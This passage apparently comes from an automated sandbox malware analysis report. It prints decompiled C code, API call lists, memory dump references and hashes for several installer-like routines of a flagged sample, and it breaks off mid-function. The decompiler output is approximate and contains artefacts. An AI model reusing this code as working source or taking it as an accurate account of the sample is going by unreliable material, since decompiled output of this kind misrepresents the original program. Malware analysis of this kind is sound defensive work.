                                                                                                                          0x004029d3
                                                                                                                          0x004029d6
                                                                                                                          0x004029e0
                                                                                                                          0x004029ff
                                                                                                                          0x004029e7
                                                                                                                          0x004029ec
                                                                                                                          0x004029f4
                                                                                                                          0x004029f7
                                                                                                                          0x004029fc
                                                                                                                          0x004029fc
                                                                                                                          0x00402a06
                                                                                                                          0x00402a06
                                                                                                                          0x00402a13
                                                                                                                          0x00402a19
                                                                                                                          0x00402a1f
                                                                                                                          0x00402a1f
                                                                                                                          0x004029b7
                                                                                                                          0x00402a33
                                                                                                                          0x00402a35
                                                                                                                          0x00402a35
                                                                                                                          0x00402a3f
                                                                                                                          0x00402a40
                                                                                                                          0x00402a44
                                                                                                                          0x00402a48
                                                                                                                          0x00402a4e
                                                                                                                          0x00402a4e
                                                                                                                          0x00402a55
                                                                                                                          0x004022f1
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2667972263-0
                                                                                                                          • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                                                          • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                                                          • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                                                          • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                                          				char _v68;
                                                                                                                          				char _v132;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				signed int _t23;
                                                                                                                          				signed int _t24;
                                                                                                                          				void* _t31;
                                                                                                                          				void* _t33;
                                                                                                                          				void* _t34;
                                                                                                                          				void* _t44;
                                                                                                                          				signed int _t46;
                                                                                                                          				signed int _t50;
                                                                                                                          				signed int _t52;
                                                                                                                          				signed int _t53;
                                                                                                                          				signed int _t55;
                                                                                                                          
                                                                                                                          				_t23 = _a16;
                                                                                                                          				_t53 = _a12;
                                                                                                                          				_t44 = 0xffffffdc;
                                                                                                                          				if(_t23 == 0) {
                                                                                                                          					_push(0x14);
                                                                                                                          					_pop(0);
                                                                                                                          					_t24 = _t53;
                                                                                                                          					if(_t53 < 0x100000) {
                                                                                                                          						_push(0xa);
                                                                                                                          						_pop(0);
                                                                                                                          						_t44 = 0xffffffdd;
                                                                                                                          					}
                                                                                                                          					if(_t53 < 0x400) {
                                                                                                                          						_t44 = 0xffffffde;
                                                                                                                          					}
                                                                                                                          					if(_t53 < 0xffff3333) {
                                                                                                                          						_t52 = 0x14;
                                                                                                                          						asm("cdq");
                                                                                                                          						_t24 = 1 / _t52 + _t53;
                                                                                                                          					}
                                                                                                                          					_t25 = _t24 & 0x00ffffff;
                                                                                                                          					_t55 = _t24 >> 0;
                                                                                                                          					_t46 = 0xa;
                                                                                                                          					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                                                          				} else {
                                                                                                                          					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                                                          					_t50 = 0;
                                                                                                                          				}
                                                                                                                          				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                                                          				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                                                                                                          				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                                                                                                          				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                                                          				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                                                                                          			}



















                                                                                                                          0x00404e7a
                                                                                                                          0x00404e7f
                                                                                                                          0x00404e87
                                                                                                                          0x00404e88
                                                                                                                          0x00404e95
                                                                                                                          0x00404e9d
                                                                                                                          0x00404e9e
                                                                                                                          0x00404ea0
                                                                                                                          0x00404ea2
                                                                                                                          0x00404ea4
                                                                                                                          0x00404ea7
                                                                                                                          0x00404ea7
                                                                                                                          0x00404eae
                                                                                                                          0x00404eb4
                                                                                                                          0x00404eb4
                                                                                                                          0x00404ebb
                                                                                                                          0x00404ec2
                                                                                                                          0x00404ec5
                                                                                                                          0x00404ec8
                                                                                                                          0x00404ec8
                                                                                                                          0x00404ecc
                                                                                                                          0x00404edc
                                                                                                                          0x00404ede
                                                                                                                          0x00404ee1
                                                                                                                          0x00404e8a
                                                                                                                          0x00404e8a
                                                                                                                          0x00404e91
                                                                                                                          0x00404e91
                                                                                                                          0x00404ee9
                                                                                                                          0x00404ef4
                                                                                                                          0x00404f0a
                                                                                                                          0x00404f1b
                                                                                                                          0x00404f37

                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-0042B000), ref: 00404F12
                                                                                                                          • wsprintfW.USER32 ref: 00404F1B
                                                                                                                          • SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                          • String ID: %u.%u%s%s$H7B
                                                                                                                          • API String ID: 3540041739-107966168
                                                                                                                          • Opcode ID: 2edccdcb36c72f9bdce7a586f7ca7ee262dfb9f9a49697097ea36a1117f17e36
                                                                                                                          • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                                                          • Opcode Fuzzy Hash: 2edccdcb36c72f9bdce7a586f7ca7ee262dfb9f9a49697097ea36a1117f17e36
                                                                                                                          • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E71462480(void* __edx) {
                                                                                                                          				void* _t37;
                                                                                                                          				signed int _t38;
                                                                                                                          				void* _t39;
                                                                                                                          				void* _t41;
                                                                                                                          				signed char* _t42;
                                                                                                                          				signed char* _t51;
                                                                                                                          				void* _t52;
                                                                                                                          				void* _t54;
                                                                                                                          
                                                                                                                          				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                                                                          				while(1) {
                                                                                                                          					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                                                                          					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                                                                          					_t52 = _t51[0x18];
                                                                                                                          					if(_t52 == 0) {
                                                                                                                          						goto L9;
                                                                                                                          					}
                                                                                                                          					_t41 = 0x1a;
                                                                                                                          					if(_t52 == _t41) {
                                                                                                                          						goto L9;
                                                                                                                          					}
                                                                                                                          					if(_t52 != 0xffffffff) {
                                                                                                                          						if(_t52 <= 0 || _t52 > 0x19) {
                                                                                                                          							_t51[0x18] = _t41;
                                                                                                                          							goto L12;
                                                                                                                          						} else {
                                                                                                                          							_t37 = E7146135A(_t52 - 1);
                                                                                                                          							L10:
                                                                                                                          							goto L11;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t37 = E714612E3();
                                                                                                                          						L11:
                                                                                                                          						_t52 = _t37;
                                                                                                                          						L12:
                                                                                                                          						_t13 =  &(_t51[8]); // 0x1020
                                                                                                                          						_t42 = _t13;
                                                                                                                          						if(_t51[4] >= 0) {
                                                                                                                          						}
                                                                                                                          						_t38 =  *_t51 & 0x000000ff;
                                                                                                                          						_t51[0x1c] = 0;
                                                                                                                          						if(_t38 > 7) {
                                                                                                                          							L27:
                                                                                                                          							_t39 = GlobalFree(_t52);
                                                                                                                          							if( *(_t54 + 0x10) == 0) {
                                                                                                                          								return _t39;
                                                                                                                          							}
                                                                                                                          							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                                                                          								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                                                                          							} else {
                                                                                                                          								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                                                                          							}
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							switch( *((intOrPtr*)(_t38 * 4 +  &M714625F8))) {
                                                                                                                          								case 0:
                                                                                                                          									 *_t42 = 0;
                                                                                                                          									goto L27;
                                                                                                                          								case 1:
                                                                                                                          									__eax = E714613B1(__ebp);
                                                                                                                          									goto L21;
                                                                                                                          								case 2:
                                                                                                                          									 *__edi = E714613B1(__ebp);
                                                                                                                          									__edi[1] = __edx;
                                                                                                                          									goto L27;
                                                                                                                          								case 3:
                                                                                                                          									__eax = GlobalAlloc(0x40,  *0x7146506c);
                                                                                                                          									 *(__esi + 0x1c) = __eax;
                                                                                                                          									__edx = 0;
                                                                                                                          									 *__edi = __eax;
                                                                                                                          									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7146506c, __eax,  *0x7146506c, 0, 0);
                                                                                                                          									goto L27;
                                                                                                                          								case 4:
                                                                                                                          									__eax = E714612CC(__ebp);
                                                                                                                          									 *(__esi + 0x1c) = __eax;
                                                                                                                          									L21:
                                                                                                                          									 *__edi = __eax;
                                                                                                                          									goto L27;
                                                                                                                          								case 5:
                                                                                                                          									__eax = GlobalAlloc(0x40, 0x10);
                                                                                                                          									_push(__eax);
                                                                                                                          									 *(__esi + 0x1c) = __eax;
                                                                                                                          									_push(__ebp);
                                                                                                                          									 *__edi = __eax;
                                                                                                                          									__imp__CLSIDFromString();
                                                                                                                          									goto L27;
                                                                                                                          								case 6:
                                                                                                                          									if( *__ebp != __cx) {
                                                                                                                          										__eax = E714613B1(__ebp);
                                                                                                                          										 *__ebx = __eax;
                                                                                                                          									}
                                                                                                                          									goto L27;
                                                                                                                          								case 7:
                                                                                                                          									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                                                                          									( *(__esi + 0x18) - 1) *  *0x7146506c =  *0x71465074 + ( *(__esi + 0x18) - 1) *  *0x7146506c * 2 + 0x18;
                                                                                                                          									 *__ebx =  *0x71465074 + ( *(__esi + 0x18) - 1) *  *0x7146506c * 2 + 0x18;
                                                                                                                          									asm("cdq");
                                                                                                                          									__eax = E71461510(__edx,  *0x71465074 + ( *(__esi + 0x18) - 1) *  *0x7146506c * 2 + 0x18, __edx,  *0x71465074 + ( *(__esi + 0x18) - 1) *  *0x7146506c * 2);
                                                                                                                          									goto L27;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L9:
                                                                                                                          					_t37 = E714612CC(0x71465044);
                                                                                                                          					goto L10;
                                                                                                                          				}
                                                                                                                          			}











                                                                                                                          0x71462494
                                                                                                                          0x71462498
                                                                                                                          0x714624a3
                                                                                                                          0x714624a3
                                                                                                                          0x714624aa
                                                                                                                          0x714624af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x714624b3
                                                                                                                          0x714624b6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x714624bb
                                                                                                                          0x714624c6
                                                                                                                          0x714624d6
                                                                                                                          0x00000000
                                                                                                                          0x714624cd
                                                                                                                          0x714624cf
                                                                                                                          0x714624e5
                                                                                                                          0x00000000
                                                                                                                          0x714624e5
                                                                                                                          0x714624bd
                                                                                                                          0x714624bd
                                                                                                                          0x714624e6
                                                                                                                          0x714624e6
                                                                                                                          0x714624e8
                                                                                                                          0x714624ec
                                                                                                                          0x714624ec
                                                                                                                          0x714624ef
                                                                                                                          0x714624ef
                                                                                                                          0x714624f7
                                                                                                                          0x714624ff
                                                                                                                          0x71462502
                                                                                                                          0x714625c1
                                                                                                                          0x714625c2
                                                                                                                          0x714625cd
                                                                                                                          0x714625f7
                                                                                                                          0x714625f7
                                                                                                                          0x714625dd
                                                                                                                          0x714625e9
                                                                                                                          0x714625df
                                                                                                                          0x714625df
                                                                                                                          0x714625df
                                                                                                                          0x00000000
                                                                                                                          0x71462508
                                                                                                                          0x71462508
                                                                                                                          0x00000000
                                                                                                                          0x7146250f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71462517
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71462525
                                                                                                                          0x71462527
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71462548
                                                                                                                          0x7146254e
                                                                                                                          0x71462551
                                                                                                                          0x71462553
                                                                                                                          0x71462563
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71462530
                                                                                                                          0x71462535
                                                                                                                          0x71462538
                                                                                                                          0x71462539
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x7146256f
                                                                                                                          0x71462575
                                                                                                                          0x71462576
                                                                                                                          0x71462579
                                                                                                                          0x7146257a
                                                                                                                          0x7146257c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71462588
                                                                                                                          0x7146258b
                                                                                                                          0x71462597
                                                                                                                          0x71462599
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x714625a5
                                                                                                                          0x714625b1
                                                                                                                          0x714625b4
                                                                                                                          0x714625b6
                                                                                                                          0x714625b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x71462508
                                                                                                                          0x71462502
                                                                                                                          0x714624db
                                                                                                                          0x714624e0
                                                                                                                          0x00000000
                                                                                                                          0x714624e0

                                                                                                                          APIs
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 714625C2
                                                                                                                            • Part of subcall function 714612CC: lstrcpynW.KERNEL32(00000000,?,7146137F,00000019,714611CA,-000000A0), ref: 714612DC
                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 71462548
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 71462563
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33069504467.0000000071461000.00000020.00000001.01000000.00000005.sdmp, Offset: 71460000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33069452109.0000000071460000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069570468.0000000071464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069617155.0000000071466000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_71460000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4216380887-0
                                                                                                                          • Opcode ID: 4be867689b83e8549ad56119f0f3c9afac0805ac2fa9c88cd699c9474175c4d6
                                                                                                                          • Instruction ID: ac5d7c2bbfb125f4117a1b5716d99d3c5f012aeb00a89a39374c8ec62423c00c
                                                                                                                          • Opcode Fuzzy Hash: 4be867689b83e8549ad56119f0f3c9afac0805ac2fa9c88cd699c9474175c4d6
                                                                                                                          • Instruction Fuzzy Hash: 5941AAF1108306FFD725DF259840E2677FCFB94318F10892EE8478A690EB30A549CB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E00401D81(void* __ebx, void* __edx) {
                                                                                                                          				struct HWND__* _t30;
                                                                                                                          				WCHAR* _t38;
                                                                                                                          				void* _t48;
                                                                                                                          				void* _t53;
                                                                                                                          				signed int _t55;
                                                                                                                          				signed int _t60;
                                                                                                                          				long _t63;
                                                                                                                          				void* _t65;
                                                                                                                          
                                                                                                                          				_t53 = __ebx;
                                                                                                                          				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                                                                          					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                                                                          				} else {
                                                                                                                          					E00402D84(2);
                                                                                                                          					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                                                                          				}
                                                                                                                          				_t55 =  *(_t65 - 0x24);
                                                                                                                          				 *(_t65 + 8) = _t30;
                                                                                                                          				_t60 = _t55 & 0x00000004;
                                                                                                                          				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                                                                          				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                                                                          				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                                                                          				if((_t55 & 0x00010000) == 0) {
                                                                                                                          					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                                                                          				} else {
                                                                                                                          					_t38 = E00402DA6(0x11);
                                                                                                                          				}
                                                                                                                          				 *(_t65 - 0x44) = _t38;
                                                                                                                          				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                                                                          				asm("sbb esi, esi");
                                                                                                                          				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                                                                          				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                                                                          				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                                                                          					DeleteObject(_t48);
                                                                                                                          				}
                                                                                                                          				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                                                                          					_push(_t63);
                                                                                                                          					E004065AF();
                                                                                                                          				}
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}











                                                                                                                          0x00401d81
                                                                                                                          0x00401d85
                                                                                                                          0x00401d9a
                                                                                                                          0x00401d87
                                                                                                                          0x00401d89
                                                                                                                          0x00401d8f
                                                                                                                          0x00401d8f
                                                                                                                          0x00401da0
                                                                                                                          0x00401da3
                                                                                                                          0x00401dad
                                                                                                                          0x00401db0
                                                                                                                          0x00401db8
                                                                                                                          0x00401dc9
                                                                                                                          0x00401dcc
                                                                                                                          0x00401dd7
                                                                                                                          0x00401dce
                                                                                                                          0x00401dd0
                                                                                                                          0x00401dd0
                                                                                                                          0x00401ddb
                                                                                                                          0x00401de5
                                                                                                                          0x00401e0c
                                                                                                                          0x00401e1b
                                                                                                                          0x00401e29
                                                                                                                          0x00401e31
                                                                                                                          0x00401e39
                                                                                                                          0x00401e39
                                                                                                                          0x00401e42
                                                                                                                          0x00401e48
                                                                                                                          0x00402ba4
                                                                                                                          0x00402ba4
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                          • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                                                          • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                                                          • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                                                          • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 73%
                                                                                                                          			E00401E4E(intOrPtr __edx) {
                                                                                                                          				void* __edi;
                                                                                                                          				int _t9;
                                                                                                                          				signed char _t15;
                                                                                                                          				struct HFONT__* _t18;
                                                                                                                          				intOrPtr _t30;
                                                                                                                          				void* _t31;
                                                                                                                          				struct HDC__* _t33;
                                                                                                                          				void* _t35;
                                                                                                                          
                                                                                                                          				_t30 = __edx;
                                                                                                                          				_t33 = GetDC( *(_t35 - 8));
                                                                                                                          				_t9 = E00402D84(2);
                                                                                                                          				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                                                          				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                                                                          				ReleaseDC( *(_t35 - 8), _t33);
                                                                                                                          				 *0x40ce08 = E00402D84(3);
                                                                                                                          				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                                                                          				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                                                          				 *0x40ce0f = 1;
                                                                                                                          				 *0x40ce0c = _t15 & 0x00000001;
                                                                                                                          				 *0x40ce0d = _t15 & 0x00000002;
                                                                                                                          				 *0x40ce0e = _t15 & 0x00000004;
                                                                                                                          				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                                                                                                          				_t18 = CreateFontIndirectW(0x40cdf8);
                                                                                                                          				_push(_t18);
                                                                                                                          				_push(_t31);
                                                                                                                          				E004065AF();
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}











                                                                                                                          0x00401e4e
                                                                                                                          0x00401e59
                                                                                                                          0x00401e5b
                                                                                                                          0x00401e68
                                                                                                                          0x00401e7f
                                                                                                                          0x00401e84
                                                                                                                          0x00401e91
                                                                                                                          0x00401e96
                                                                                                                          0x00401e9a
                                                                                                                          0x00401ea5
                                                                                                                          0x00401eac
                                                                                                                          0x00401ebe
                                                                                                                          0x00401ec4
                                                                                                                          0x00401ec9
                                                                                                                          0x00401ed3
                                                                                                                          0x00402638
                                                                                                                          0x0040156d
                                                                                                                          0x00402ba4
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(?), ref: 00401E51
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                            • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                            • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,00000000), ref: 004068A4
                                                                                                                          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2584051700-0
                                                                                                                          • Opcode ID: e128970cf71a0b284ce18b21917758e509e5717976d06807f88455f58f814df6
                                                                                                                          • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                                                          • Opcode Fuzzy Hash: e128970cf71a0b284ce18b21917758e509e5717976d06807f88455f58f814df6
                                                                                                                          • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E714616BD(struct HINSTANCE__* _a4, short* _a8) {
                                                                                                                          				_Unknown_base(*)()* _t7;
                                                                                                                          				void* _t10;
                                                                                                                          				int _t14;
                                                                                                                          
                                                                                                                          				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                                                                          				_t10 = GlobalAlloc(0x40, _t14);
